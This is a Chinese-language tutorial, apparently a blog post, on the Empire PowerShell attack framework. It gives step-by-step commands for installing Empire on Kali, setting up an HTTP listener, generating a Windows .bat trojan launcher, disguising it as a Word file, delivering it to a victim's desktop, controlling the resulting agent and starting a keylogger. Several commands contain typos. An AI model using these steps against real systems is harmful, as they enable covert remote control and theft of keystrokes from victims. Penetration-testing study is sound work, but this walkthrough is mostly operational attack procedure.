一.Empire 介绍
Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powshell.exe就可运行Powershell代理的功能,还可以快速在后期部署漏洞利用模块,其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等,使用能够躲避内网检测和大部分安全防护工具的查杀,简单来说就有点类似Metasploit,是一个基于PowerShell的远程控制木马。
二.下载帝国的三个方法
1.1 window中通过网站下载
Releases · EmpireProject/Empire · GitHub
使用empire2.5版本,不是所有电脑都适用(kali)
1.2 kali中直接下载
(root账号下执行命令)
git clone https://github.com/BC-SECURITY/Empire #下载帝国cd Empire
查看python环境
python
python2
退出python环境1.3 kali中通过powershell安装
1.3.在kali中通过powershell进行下载
sudo apt install powrshell-empire #安装帝国
powershell-empire server #开启服务
powershell-empire client #开启客户端
三.监听命令
3.1监听http
listeners #进入监听界面
#进入http监听模式
3.2 ipconfig查看虚拟机ip(监听者)
输入ipconfig进行查看
3.3设置监听
set Name text1 #设置一个监听
set Host 192.168.48.128/9999
set Port 9999
execute #回到监听页面
list / listeners
3.4 木马
3.4.1 生成bat类型的木马
uselistener
usestager
windows/launcher_bat
info #查看一些基本信息
set Listener text1 #设置你想使用哪个监听线程
按照路径提示找木马文件
agents #查看监听状态i
interact 代理名称 #连接操作系统
复制生成的木马发送到主机桌面
bat可以使用word进行伪装
3.4.2 监听键盘
usemodule powershell/collection/keylogger